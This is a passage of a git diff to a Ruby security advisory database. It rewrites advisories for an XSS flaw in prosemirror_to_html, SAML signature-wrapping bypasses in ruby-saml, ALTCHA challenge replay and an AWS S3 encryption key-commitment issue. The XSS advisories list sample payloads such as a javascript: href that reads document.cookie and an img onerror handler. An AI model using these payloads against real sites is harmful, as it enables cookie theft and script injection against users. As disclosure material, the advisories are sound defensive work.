+    - https://github.com/njh/ruby-mqtt/blob/main/NEWS.md#ruby-mqtt-version-070-2025-10-29
+    - https://access.redhat.com/security/cve/CVE-2025-12790
+    - https://bugzilla.redhat.com/show_bug.cgi?id=2413004
+    - https://github.com/advisories/GHSA-9c5q-w6gr-fxcq
+---
diff --git a/advisories/_posts/2025-11-06-CVE-2025-64501.md b/advisories/_posts/2025-11-06-CVE-2025-64501.md
index c3185f1b..41e03fbd 100644
--- a/advisories/_posts/2025-11-06-CVE-2025-64501.md
+++ b/advisories/_posts/2025-11-06-CVE-2025-64501.md
@@ -1,88 +1,88 @@
----
-layout: advisory
-title: 'CVE-2025-64501 (prosemirror_to_html): Cross-Site Scripting (XSS) vulnerability
-  through unescaped HTML attribute values'
-comments: false
-categories:
-- prosemirror_to_html
-advisory:
-  gem: prosemirror_to_html
-  cve: 2025-64501
-  ghsa: 52c5-vh7f-26fx
-  url: https://github.com/etaminstudio/prosemirror_to_html/security/advisories/GHSA-52c5-vh7f-26fx
-  title: Cross-Site Scripting (XSS) vulnerability through unescaped HTML attribute
-    values
-  date: 2025-11-06
-  description: |
-    ### Impact
-
-    The prosemirror_to_html gem is vulnerable to Cross-Site Scripting
-    (XSS) attacks through malicious HTML attribute values. While tag
-    content is properly escaped, attribute values are not, allowing
-    attackers to inject arbitrary JavaScript code.
-
-    **Who is impacted:**
-
-    - Any application using prosemirror_to_html to convert ProseMirror
-      documents to HTML
-    - Applications that process user-generated ProseMirror content are
-      at highest risk
-    - End users viewing the rendered HTML output could have malicious
-     JavaScript executed in their browsers
-
-    **Attack vectors include:**
-
-    - `href` attributes with `javascript:` protocol: `<a href="javascript:alert(document.cookie)">`
-    - Event handlers: `<div onclick="maliciousCode()">`
-    - `onerror` attributes on images: `<img src=x onerror="alert('XSS')">`
-    - Other HTML attributes that can execute JavaScript
-
-    ### Patches
-
-    A fix is currently in development. Users should upgrade to
-    version **0.2.1** or later once released.
-
-    The patch escapes all HTML attribute values using `CGI.escapeHTML`
-    to prevent injection attacks.
-
-    ### Workarounds
-
-    Until a patched version is available, users can implement one or
-    more of these mitigations:
-
-    1. **Sanitize output**: Pass the HTML output through a sanitization
-       library like [Sanitize](https://github.com/rgrove/sanitize) or
-       [Loofah](https://github.com/flavorjones/loofah):
-
-    ```ruby
-       html = ProsemirrorToHtml.render(document)
-       safe_html = Sanitize.fragment(html, Sanitize::Config::RELAXED)
-    ```
-
-    2. **Implement Content Security Policy (CSP)**: Add strict CSP
-       headers to prevent inline JavaScript execution:
-
-    ```
-       Content-Security-Policy: default-src 'self'; script-src 'self'
-    ```
-
-    3. **Input validation**: If possible, validate and sanitize
-       ProseMirror documents before conversion to prevent malicious
-       content from entering the system.
-
-    ### References
-
-    - Vulnerable code: https://github.com/etaminstudio/prosemirror_to_html/blob/ea8beb32f6c37f29f042ba4155ccf18504da716e/lib/prosemirror_to_html.rb#L249
-    - [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
-    - [CWE-79: Improper Neutralization of Input During Web Page Generation](https://cwe.mitre.org/data/definitions/79.html)
-  cvss_v3: 7.6
-  patched_versions:
-  - ">= 0.2.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-64501
-    - https://github.com/etaminstudio/prosemirror_to_html/security/advisories/GHSA-52c5-vh7f-26fx
-    - https://github.com/etaminstudio/prosemirror_to_html/releases/tag/v0.2.1
-    - https://github.com/etaminstudio/prosemirror_to_html/commit/4d59f94f550bcabeec30d298791bbdd883298ad8
-    - https://github.com/advisories/GHSA-52c5-vh7f-26fx
----
+---
+layout: advisory
+title: 'CVE-2025-64501 (prosemirror_to_html): Cross-Site Scripting (XSS) vulnerability
+  through unescaped HTML attribute values'
+comments: false
+categories:
+- prosemirror_to_html
+advisory:
+  gem: prosemirror_to_html
+  cve: 2025-64501
+  ghsa: 52c5-vh7f-26fx
+  url: https://github.com/etaminstudio/prosemirror_to_html/security/advisories/GHSA-52c5-vh7f-26fx
+  title: Cross-Site Scripting (XSS) vulnerability through unescaped HTML attribute
+    values
+  date: 2025-11-06
+  description: |
+    ### Impact
+
+    The prosemirror_to_html gem is vulnerable to Cross-Site Scripting
+    (XSS) attacks through malicious HTML attribute values. While tag
+    content is properly escaped, attribute values are not, allowing
+    attackers to inject arbitrary JavaScript code.
+
+    **Who is impacted:**
+
+    - Any application using prosemirror_to_html to convert ProseMirror
+      documents to HTML
+    - Applications that process user-generated ProseMirror content are
+      at highest risk
+    - End users viewing the rendered HTML output could have malicious
+     JavaScript executed in their browsers
+
+    **Attack vectors include:**
+
+    - `href` attributes with `javascript:` protocol: `<a href="javascript:alert(document.cookie)">`
+    - Event handlers: `<div onclick="maliciousCode()">`
+    - `onerror` attributes on images: `<img src=x onerror="alert('XSS')">`
+    - Other HTML attributes that can execute JavaScript
+
+    ### Patches
+
+    A fix is currently in development. Users should upgrade to
+    version **0.2.1** or later once released.
+
+    The patch escapes all HTML attribute values using `CGI.escapeHTML`
+    to prevent injection attacks.
+
+    ### Workarounds
+
+    Until a patched version is available, users can implement one or
+    more of these mitigations:
+
+    1. **Sanitize output**: Pass the HTML output through a sanitization
+       library like [Sanitize](https://github.com/rgrove/sanitize) or
+       [Loofah](https://github.com/flavorjones/loofah):
+
+    ```ruby
+       html = ProsemirrorToHtml.render(document)
+       safe_html = Sanitize.fragment(html, Sanitize::Config::RELAXED)
+    ```
+
+    2. **Implement Content Security Policy (CSP)**: Add strict CSP
+       headers to prevent inline JavaScript execution:
+
+    ```
+       Content-Security-Policy: default-src 'self'; script-src 'self'
+    ```
+
+    3. **Input validation**: If possible, validate and sanitize
+       ProseMirror documents before conversion to prevent malicious
+       content from entering the system.
+
+    ### References
+
+    - Vulnerable code: https://github.com/etaminstudio/prosemirror_to_html/blob/ea8beb32f6c37f29f042ba4155ccf18504da716e/lib/prosemirror_to_html.rb#L249
+    - [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
+    - [CWE-79: Improper Neutralization of Input During Web Page Generation](https://cwe.mitre.org/data/definitions/79.html)
+  cvss_v3: 7.6
+  patched_versions:
+  - ">= 0.2.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-64501
+    - https://github.com/etaminstudio/prosemirror_to_html/security/advisories/GHSA-52c5-vh7f-26fx
+    - https://github.com/etaminstudio/prosemirror_to_html/releases/tag/v0.2.1
+    - https://github.com/etaminstudio/prosemirror_to_html/commit/4d59f94f550bcabeec30d298791bbdd883298ad8
+    - https://github.com/advisories/GHSA-52c5-vh7f-26fx
+---
diff --git a/advisories/_posts/2025-11-13-GHSA-4249-gjr8-jpq3.md b/advisories/_posts/2025-11-13-GHSA-4249-gjr8-jpq3.md
index c8e8bd6e..a2adc33f 100644
--- a/advisories/_posts/2025-11-13-GHSA-4249-gjr8-jpq3.md
+++ b/advisories/_posts/2025-11-13-GHSA-4249-gjr8-jpq3.md
@@ -1,83 +1,83 @@
----
-layout: advisory
-title: 'GHSA-4249-gjr8-jpq3 (prosemirror_to_html): ProsemirrorToHtml has a Cross-Site
-  Scripting (XSS) vulnerability through unescaped HTML attribute values'
-comments: false
-categories:
-- prosemirror_to_html
-advisory:
-  gem: prosemirror_to_html
-  ghsa: 4249-gjr8-jpq3
-  url: https://github.com/etaminstudio/prosemirror_to_html/security/advisories/GHSA-52c5-vh7f-26fx
-  title: ProsemirrorToHtml has a Cross-Site Scripting (XSS) vulnerability through
-    unescaped HTML attribute values
-  date: 2025-11-13
-  description: |
-    ### Impact
-
-    The prosemirror_to_html gem is vulnerable to Cross-Site Scripting
-    (XSS) attacks through malicious HTML attribute values. While tag
-    content is properly escaped, attribute values are not, allowing
-    attackers to inject arbitrary JavaScript code.
-
-    **Who is impacted:**
-
-    - Any application using prosemirror_to_html to convert ProseMirror
-      documents to HTML
-    - Applications that process user-generated ProseMirror content are
-      at highest risk
-    - End users viewing the rendered HTML output could have malicious
-      JavaScript executed in their browsers
-
-    **Attack vectors include:**
-
-    - `href` attributes with `javascript:` protocol:
-      `<a href="javascript:alert(document.cookie)">`
-    - Event handlers: `<div onclick="maliciousCode()">`
-    - `onerror` attributes on images: `<img src=x onerror="alert('XSS')">`
-    - Other HTML attributes that can execute JavaScript
-
-    ### Patches
-
-    A fix is currently in development. Users should upgrade to version
-    **0.2.1** or later once released. The patch escapes all HTML attribute
-    values using `CGI.escapeHTML` to prevent injection attacks.
-
-    ### Workarounds
-
-    Until a patched version is available, users can implement one or
-    more of these mitigations:
-
-    1. **Sanitize output**: Pass the HTML output through a sanitization
-       library like [Sanitize](https://github.com/rgrove/sanitize) or
-       [Loofah](https://github.com/flavorjones/loofah):
-
-    ```ruby
-       html = ProsemirrorToHtml.render(document)
-       safe_html = Sanitize.fragment(html, Sanitize::Config::RELAXED)
-    ```
-
-    2. **Implement Content Security Policy (CSP)**: Add strict CSP
-       headers to prevent inline JavaScript execution:
-    ```
-       Content-Security-Policy: default-src 'self'; script-src 'self'
-    ```
-
-    3. **Input validation**: If possible, validate and sanitize
-       ProseMirror documents before conversion to prevent malicious
-       content from entering the system.
-
-    ### References
-
-    - Vulnerable code: https://github.com/etaminstudio/prosemirror_to_html/blob/ea8beb32f6c37f29f042ba4155ccf18504da716e/lib/prosemirror_to_html.rb#L249
-    - [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
-  patched_versions:
-  - ">= 0.2.1"
-  related:
-    url:
-    - https://github.com/etaminstudio/prosemirror_to_html/security/advisories/GHSA-52c5-vh7f-26fx
-    - https://github.com/etaminstudio/prosemirror_to_html/commit/4d59f94f550bcabeec30d298791bbdd883298ad8
-    - https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
-    - https://github.com/etaminstudio/prosemirror_to_html/blob/ea8beb32f6c37f29f042ba4155ccf18504da716e/lib/prosemirror_to_html.rb#L249
-    - https://github.com/advisories/GHSA-4249-gjr8-jpq3
----
+---
+layout: advisory
+title: 'GHSA-4249-gjr8-jpq3 (prosemirror_to_html): ProsemirrorToHtml has a Cross-Site
+  Scripting (XSS) vulnerability through unescaped HTML attribute values'
+comments: false
+categories:
+- prosemirror_to_html
+advisory:
+  gem: prosemirror_to_html
+  ghsa: 4249-gjr8-jpq3
+  url: https://github.com/etaminstudio/prosemirror_to_html/security/advisories/GHSA-52c5-vh7f-26fx
+  title: ProsemirrorToHtml has a Cross-Site Scripting (XSS) vulnerability through
+    unescaped HTML attribute values
+  date: 2025-11-13
+  description: |
+    ### Impact
+
+    The prosemirror_to_html gem is vulnerable to Cross-Site Scripting
+    (XSS) attacks through malicious HTML attribute values. While tag
+    content is properly escaped, attribute values are not, allowing
+    attackers to inject arbitrary JavaScript code.
+
+    **Who is impacted:**
+
+    - Any application using prosemirror_to_html to convert ProseMirror
+      documents to HTML
+    - Applications that process user-generated ProseMirror content are
+      at highest risk
+    - End users viewing the rendered HTML output could have malicious
+      JavaScript executed in their browsers
+
+    **Attack vectors include:**
+
+    - `href` attributes with `javascript:` protocol:
+      `<a href="javascript:alert(document.cookie)">`
+    - Event handlers: `<div onclick="maliciousCode()">`
+    - `onerror` attributes on images: `<img src=x onerror="alert('XSS')">`
+    - Other HTML attributes that can execute JavaScript
+
+    ### Patches
+
+    A fix is currently in development. Users should upgrade to version
+    **0.2.1** or later once released. The patch escapes all HTML attribute
+    values using `CGI.escapeHTML` to prevent injection attacks.
+
+    ### Workarounds
+
+    Until a patched version is available, users can implement one or
+    more of these mitigations:
+
+    1. **Sanitize output**: Pass the HTML output through a sanitization
+       library like [Sanitize](https://github.com/rgrove/sanitize) or
+       [Loofah](https://github.com/flavorjones/loofah):
+
+    ```ruby
+       html = ProsemirrorToHtml.render(document)
+       safe_html = Sanitize.fragment(html, Sanitize::Config::RELAXED)
+    ```
+
+    2. **Implement Content Security Policy (CSP)**: Add strict CSP
+       headers to prevent inline JavaScript execution:
+    ```
+       Content-Security-Policy: default-src 'self'; script-src 'self'
+    ```
+
+    3. **Input validation**: If possible, validate and sanitize
+       ProseMirror documents before conversion to prevent malicious
+       content from entering the system.
+
+    ### References
+
+    - Vulnerable code: https://github.com/etaminstudio/prosemirror_to_html/blob/ea8beb32f6c37f29f042ba4155ccf18504da716e/lib/prosemirror_to_html.rb#L249
+    - [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
+  patched_versions:
+  - ">= 0.2.1"
+  related:
+    url:
+    - https://github.com/etaminstudio/prosemirror_to_html/security/advisories/GHSA-52c5-vh7f-26fx
+    - https://github.com/etaminstudio/prosemirror_to_html/commit/4d59f94f550bcabeec30d298791bbdd883298ad8
+    - https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
+    - https://github.com/etaminstudio/prosemirror_to_html/blob/ea8beb32f6c37f29f042ba4155ccf18504da716e/lib/prosemirror_to_html.rb#L249
+    - https://github.com/advisories/GHSA-4249-gjr8-jpq3
+---
diff --git a/advisories/_posts/2025-12-08-CVE-2025-66567.md b/advisories/_posts/2025-12-08-CVE-2025-66567.md
index 8236ab43..7344cc0f 100644
--- a/advisories/_posts/2025-12-08-CVE-2025-66567.md
+++ b/advisories/_posts/2025-12-08-CVE-2025-66567.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2025-66567 (ruby-saml): Ruby-saml has a SAML authentication bypass due
-  to namespace handling (parser differential)'
-comments: false
-categories:
-- ruby-saml
-advisory:
-  gem: ruby-saml
-  cve: 2025-66567
-  ghsa: 9v8j-x534-2fx3
-  url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-9v8j-x534-2fx3
-  title: Ruby-saml has a SAML authentication bypass due to namespace handling (parser
-    differential)
-  date: 2025-12-08
-  description: |
-    ### Summary
-
-    Ruby-saml up to and including 1.12.4, there is an authentication
-    bypass vulnerability because of an incomplete fix for CVE-2025-25292.
-    ReXML and Nokogiri parse XML differently, the parsers can generate
-    entirely different document structures from the same XML input.
-    That allows an attacker to be able to execute a Signature Wrapping
-    attack. The vulnerability does not affect the version 1.18.0.
-
-    ### Impact
-
-    That allows an attacker to be able to execute a Signature Wrapping
-    attack and bypass the authentication
-  cvss_v3: 9.1
-  cvss_v4: 9.3
-  patched_versions:
-  - ">= 1.18.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-66567
-    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-9v8j-x534-2fx3
-    - https://github.com/SAML-Toolkits/ruby-saml/commit/e9c1cdbd0f9afa467b585de279db0cbd0fb8ae97
-    - https://github.com/advisories/GHSA-754f-8gm6-c4r2
-    - https://github.com/advisories/GHSA-9v8j-x534-2fx3
----
+---
+layout: advisory
+title: 'CVE-2025-66567 (ruby-saml): Ruby-saml has a SAML authentication bypass due
+  to namespace handling (parser differential)'
+comments: false
+categories:
+- ruby-saml
+advisory:
+  gem: ruby-saml
+  cve: 2025-66567
+  ghsa: 9v8j-x534-2fx3
+  url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-9v8j-x534-2fx3
+  title: Ruby-saml has a SAML authentication bypass due to namespace handling (parser
+    differential)
+  date: 2025-12-08
+  description: |
+    ### Summary
+
+    Ruby-saml up to and including 1.12.4, there is an authentication
+    bypass vulnerability because of an incomplete fix for CVE-2025-25292.
+    ReXML and Nokogiri parse XML differently, the parsers can generate
+    entirely different document structures from the same XML input.
+    That allows an attacker to be able to execute a Signature Wrapping
+    attack. The vulnerability does not affect the version 1.18.0.
+
+    ### Impact
+
+    That allows an attacker to be able to execute a Signature Wrapping
+    attack and bypass the authentication
+  cvss_v3: 9.1
+  cvss_v4: 9.3
+  patched_versions:
+  - ">= 1.18.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-66567
+    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-9v8j-x534-2fx3
+    - https://github.com/SAML-Toolkits/ruby-saml/commit/e9c1cdbd0f9afa467b585de279db0cbd0fb8ae97
+    - https://github.com/advisories/GHSA-754f-8gm6-c4r2
+    - https://github.com/advisories/GHSA-9v8j-x534-2fx3
+---
diff --git a/advisories/_posts/2025-12-08-CVE-2025-66568.md b/advisories/_posts/2025-12-08-CVE-2025-66568.md
index 8c07766d..72bf2667 100644
--- a/advisories/_posts/2025-12-08-CVE-2025-66568.md
+++ b/advisories/_posts/2025-12-08-CVE-2025-66568.md
@@ -1,52 +1,52 @@
----
-layout: advisory
-title: 'CVE-2025-66568 (ruby-saml): Ruby-saml allows a Libxml2 Canonicalization error
-  to bypass Digest/Signature validation'
-comments: false
-categories:
-- ruby-saml
-advisory:
-  gem: ruby-saml
-  cve: 2025-66568
-  ghsa: x4h9-gwv3-r4m4
-  url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-x4h9-gwv3-r4m4
-  title: Ruby-saml allows a Libxml2 Canonicalization error to bypass Digest/Signature
-    validation
-  date: 2025-12-08
-  description: |
-    ### Summary
-
-    Ruby-saml up to and including 1.12.4, there is an authentication
-    bypass vulnerability because of an issue at libxml2 canonicalization
-    process used by Nokogiri for document transformation. That allows
-    an attacker to be able to execute a Signature Wrapping attack.
-    The vulnerability does not affect the version 1.18.0.
-
-    ### Details
-
-    When libxml2’s canonicalization is invoked on an invalid XML input,
-    it may return an empty string rather than a canonicalized node.
-    ruby-saml then proceeds to compute the DigestValue over this empty
-    string, treating it as if canonicalization succeeded.
-
-    ### Impact
-
-    1. Digest bypass: By crafting input that causes canonicalization to
-       yield an empty string, the attacker can manipulate validation to
-       pass incorrectly.
-
-    2. Signature replay on empty canonical form: If an empty string has
-       been signed once (e.g., in a prior interaction or via a
-       misconfigured flow), that signature can potentially be replayed
-       to bypass authentication.
-  cvss_v3: 9.1
-  cvss_v4: 9.3
-  patched_versions:
-  - ">= 1.18.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-66568
-    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-x4h9-gwv3-r4m4
-    - https://github.com/SAML-Toolkits/ruby-saml/commit/acac9e9cc0b9a507882c614f25d41f8b47be349a
-    - https://github.com/advisories/GHSA-x4h9-gwv3-r4m4
----
+---
+layout: advisory
+title: 'CVE-2025-66568 (ruby-saml): Ruby-saml allows a Libxml2 Canonicalization error
+  to bypass Digest/Signature validation'
+comments: false
+categories:
+- ruby-saml
+advisory:
+  gem: ruby-saml
+  cve: 2025-66568
+  ghsa: x4h9-gwv3-r4m4
+  url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-x4h9-gwv3-r4m4
+  title: Ruby-saml allows a Libxml2 Canonicalization error to bypass Digest/Signature
+    validation
+  date: 2025-12-08
+  description: |
+    ### Summary
+
+    Ruby-saml up to and including 1.12.4, there is an authentication
+    bypass vulnerability because of an issue at libxml2 canonicalization
+    process used by Nokogiri for document transformation. That allows
+    an attacker to be able to execute a Signature Wrapping attack.
+    The vulnerability does not affect the version 1.18.0.
+
+    ### Details
+
+    When libxml2’s canonicalization is invoked on an invalid XML input,
+    it may return an empty string rather than a canonicalized node.
+    ruby-saml then proceeds to compute the DigestValue over this empty
+    string, treating it as if canonicalization succeeded.
+
+    ### Impact
+
+    1. Digest bypass: By crafting input that causes canonicalization to
+       yield an empty string, the attacker can manipulate validation to
+       pass incorrectly.
+
+    2. Signature replay on empty canonical form: If an empty string has
+       been signed once (e.g., in a prior interaction or via a
+       misconfigured flow), that signature can potentially be replayed
+       to bypass authentication.
+  cvss_v3: 9.1
+  cvss_v4: 9.3
+  patched_versions:
+  - ">= 1.18.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-66568
+    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-x4h9-gwv3-r4m4
+    - https://github.com/SAML-Toolkits/ruby-saml/commit/acac9e9cc0b9a507882c614f25d41f8b47be349a
+    - https://github.com/advisories/GHSA-x4h9-gwv3-r4m4
+---
diff --git a/advisories/_posts/2025-12-16-CVE-2025-68113.md b/advisories/_posts/2025-12-16-CVE-2025-68113.md
index a2c324b4..e0ba3873 100644
--- a/advisories/_posts/2025-12-16-CVE-2025-68113.md
+++ b/advisories/_posts/2025-12-16-CVE-2025-68113.md
@@ -1,66 +1,66 @@
----
-layout: advisory
-title: 'CVE-2025-68113 (altcha): ALTCHA Proof-of-Work Vulnerable to Challenge Splicing
-  and Replay'
-comments: false
-categories:
-- altcha
-advisory:
-  gem: altcha
-  cve: 2025-68113
-  ghsa: 6gvq-jcmp-8959
-  url: https://github.com/altcha-org/altcha-lib/security/advisories/GHSA-6gvq-jcmp-8959
-  title: ALTCHA Proof-of-Work Vulnerable to Challenge Splicing and Replay
-  date: 2025-12-16
-  description: |
-    ### Impact
-
-    A cryptographic semantic binding flaw in ALTCHA libraries allows
-    challenge payload splicing, which may enable replay attacks. The
-    HMAC signature does not unambiguously bind challenge parameters to
-    the nonce, allowing an attacker to reinterpret a valid proof-of-work
-    submission with a modified expiration value.
-
-    This may allow previously solved challenges to be reused beyond
-    their intended lifetime, depending on server-side replay handling
-    and deployment assumptions.
-
-    The vulnerability primarily impacts abuse-prevention mechanisms such
-    as rate limiting and bot mitigation.
-
-    It does not directly affect data confidentiality or integrity.
-
-    ### Patches
-
-    This issue has been addressed by enforcing explicit semantic
-    separation between challenge parameters and the nonce during
-    HMAC computation.
-
-    Users are advised to upgrade to patched versions.
-
-    ### Workarounds
-
-    As a mitigation, implementations may append a delimiter to the
-    end of the `salt` value prior to HMAC computation (for example,
-    `<salt>?expires=<time>&`). This prevents ambiguity between
-    parameters and the nonce and is backward-compatible with existing
-    implementations, as the delimiter is treated as a standard URL
-    parameter separator."
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 1.0.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-68113
-    - https://github.com/altcha-org/altcha-lib/security/advisories/GHSA-6gvq-jcmp-8959
-    - https://github.com/altcha-org/altcha-lib-ex/commit/09b2bad466ad0338a5b24245380950ea9918333e
-    - https://github.com/altcha-org/altcha-lib-go/commit/4a5610745ef79895a67bac858b2e4f291c2614b8
-    - https://github.com/altcha-org/altcha-lib-java/commit/69277651fdd6418ae10bf3a088901506f9c62114
-    - https://github.com/altcha-org/altcha-lib-php/commit/9e9e70c864a9db960d071c77c778be0c9ff1a4d0
-    - https://github.com/altcha-org/altcha-lib-rb/commit/4fd7b64cbbfc713f3ca4e066c2dd466e3b8d359b
-    - https://github.com/altcha-org/altcha-lib/commit/cb95d83a8d08e273b6be15e48988e7eaf60d5c08
-    - https://github.com/altcha-org/altcha-lib-java/releases/tag/v1.3.0
-    - https://github.com/altcha-org/altcha-lib-php/releases/tag/v1.3.1
-    - https://github.com/altcha-org/altcha-lib/releases/tag/1.4.1
-    - https://github.com/advisories/GHSA-6gvq-jcmp-8959
----
+---
+layout: advisory
+title: 'CVE-2025-68113 (altcha): ALTCHA Proof-of-Work Vulnerable to Challenge Splicing
+  and Replay'
+comments: false
+categories:
+- altcha
+advisory:
+  gem: altcha
+  cve: 2025-68113
+  ghsa: 6gvq-jcmp-8959
+  url: https://github.com/altcha-org/altcha-lib/security/advisories/GHSA-6gvq-jcmp-8959
+  title: ALTCHA Proof-of-Work Vulnerable to Challenge Splicing and Replay
+  date: 2025-12-16
+  description: |
+    ### Impact
+
+    A cryptographic semantic binding flaw in ALTCHA libraries allows
+    challenge payload splicing, which may enable replay attacks. The
+    HMAC signature does not unambiguously bind challenge parameters to
+    the nonce, allowing an attacker to reinterpret a valid proof-of-work
+    submission with a modified expiration value.
+
+    This may allow previously solved challenges to be reused beyond
+    their intended lifetime, depending on server-side replay handling
+    and deployment assumptions.
+
+    The vulnerability primarily impacts abuse-prevention mechanisms such
+    as rate limiting and bot mitigation.
+
+    It does not directly affect data confidentiality or integrity.
+
+    ### Patches
+
+    This issue has been addressed by enforcing explicit semantic
+    separation between challenge parameters and the nonce during
+    HMAC computation.
+
+    Users are advised to upgrade to patched versions.
+
+    ### Workarounds
+
+    As a mitigation, implementations may append a delimiter to the
+    end of the `salt` value prior to HMAC computation (for example,
+    `<salt>?expires=<time>&`). This prevents ambiguity between
+    parameters and the nonce and is backward-compatible with existing
+    implementations, as the delimiter is treated as a standard URL
+    parameter separator."
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 1.0.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-68113
+    - https://github.com/altcha-org/altcha-lib/security/advisories/GHSA-6gvq-jcmp-8959
+    - https://github.com/altcha-org/altcha-lib-ex/commit/09b2bad466ad0338a5b24245380950ea9918333e
+    - https://github.com/altcha-org/altcha-lib-go/commit/4a5610745ef79895a67bac858b2e4f291c2614b8
+    - https://github.com/altcha-org/altcha-lib-java/commit/69277651fdd6418ae10bf3a088901506f9c62114
+    - https://github.com/altcha-org/altcha-lib-php/commit/9e9e70c864a9db960d071c77c778be0c9ff1a4d0
+    - https://github.com/altcha-org/altcha-lib-rb/commit/4fd7b64cbbfc713f3ca4e066c2dd466e3b8d359b
+    - https://github.com/altcha-org/altcha-lib/commit/cb95d83a8d08e273b6be15e48988e7eaf60d5c08
+    - https://github.com/altcha-org/altcha-lib-java/releases/tag/v1.3.0
+    - https://github.com/altcha-org/altcha-lib-php/releases/tag/v1.3.1
+    - https://github.com/altcha-org/altcha-lib/releases/tag/1.4.1
+    - https://github.com/advisories/GHSA-6gvq-jcmp-8959
+---
diff --git a/advisories/_posts/2025-12-18-CVE-2025-14762.md b/advisories/_posts/2025-12-18-CVE-2025-14762.md
index c3cb8a1b..80531461 100644
--- a/advisories/_posts/2025-12-18-CVE-2025-14762.md
+++ b/advisories/_posts/2025-12-18-CVE-2025-14762.md
@@ -1,87 +1,87 @@
----
-layout: advisory
-title: 'CVE-2025-14762 (aws-sdk-s3): AWS SDK for Ruby''s S3 Encryption Client has
-  a Key Commitment Issue'
-comments: false
-categories:
-- aws-sdk-s3
-advisory:
-  gem: aws-sdk-s3
-  cve: 2025-14762
-  ghsa: 2xgq-q749-89fq
-  url: https://github.com/aws/aws-sdk-ruby/security/advisories/GHSA-2xgq-q749-89fq
-  title: AWS SDK for Ruby's S3 Encryption Client has a Key Commitment Issue
-  date: 2025-12-18
-  description: |
-    ## Summary
-
-    S3 Encryption Client for Ruby is an open-source client-side encryption
-    library used to facilitate writing and reading encrypted records to S3.
-
-    When the encrypted data key (EDK) is stored in an "Instruction File"
-    instead of S3's metadata record, the EDK is exposed to an "Invisible
-    Salamanders" attack (https://eprint.iacr.org/2019/016), which could
-    allow the EDK to be replaced with a new key.
-
-    ## Impact
-
-    ### Background - Key Commitment
-
-    There is a cryptographic property whereby under certain conditions,
-    a single ciphertext can be decrypted into 2 different plaintexts by
-    using different encryption keys. To address this issue, strong
-    encryption schemes use what is known as "key commitment", a process
-    by which an encrypted message can only be decrypted by one key;
-    the key used to originally encrypt the message.
-
-    In older versions of S3EC, when customers are also using a feature
-    called "Instruction File" to store EDKs, key commitment is not
-    implemented because multiple EDKs could be associated to an underlying
-    encrypted message object.  For such customers an attack that leverages
-    the lack of key commitment is possible.  A bad actor would need two
-    things to leverage this issue:
-      (i) the ability to create a separate, rogue, EDK that will also
-           decrypt the underlying object to produce desired plaintext, and
-      (ii) permission to upload a new instruction file to the S3 bucket
-           to replace the existing instruction file placed there by the
-           user using the S3C.  Any future attempt to decrypt the
-           underlying encrypted message with the S3EC will unwittingly
-           use the rogue EDK to produce a valid plaintext message.
-
-    ### Impacted versions: <= 1.207.0
-
-    ## Patches
-
-    We are introducing the concept of "key commitment\" to S3EC where the
-    EDK is cryptographically bound to the ciphertext in order to address
-    this issue.  In order to maintain compatibility for in-flight messages
-    we are releasing the fix in two versions. A code-compatible minor
-    version that can read messages with key-commitment but not write them,
-    and a new major version that can both read and write messages with
-    key-commitment. For maximum safety customers are asked to upgrade to
-    the latest major version: 1.208.0 or later.
-
-    ### Workarounds
-
-    There are no workarounds, please upgrade to the suggested version of S3EC.
-
-    ### References
-
-    If customers have any questions or comments about this advisory,
-    AWS SDK for Ruby asks that they contact AWS Security via the issue
-    reporting page or directly via email  to
-    [aws-security@amazon.com](mailto:aws-security@amazon.com).
-    Please do not create a public GitHub issue.
-  cvss_v3: 5.3
-  cvss_v4: 6.0
-  patched_versions:
-  - ">= 1.208.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-14762
-    - https://rubygems.org/gems/aws-sdk-s3/versions/1.208.0
-    - https://github.com/aws/aws-sdk-ruby/security/advisories/GHSA-2xgq-q749-89fq
-    - https://github.com/aws/aws-sdk-ruby/commit/b633ba10cd2fbc4cc770b76ab531ed9647654044
-    - https://aws.amazon.com/security/security-bulletins/AWS-2025-032
-    - https://github.com/advisories/GHSA-2xgq-q749-89fq
----
+---
+layout: advisory
+title: 'CVE-2025-14762 (aws-sdk-s3): AWS SDK for Ruby''s S3 Encryption Client has
+  a Key Commitment Issue'
+comments: false
+categories:
+- aws-sdk-s3
+advisory:
+  gem: aws-sdk-s3
+  cve: 2025-14762
+  ghsa: 2xgq-q749-89fq
+  url: https://github.com/aws/aws-sdk-ruby/security/advisories/GHSA-2xgq-q749-89fq
+  title: AWS SDK for Ruby's S3 Encryption Client has a Key Commitment Issue
+  date: 2025-12-18
+  description: |
+    ## Summary
+
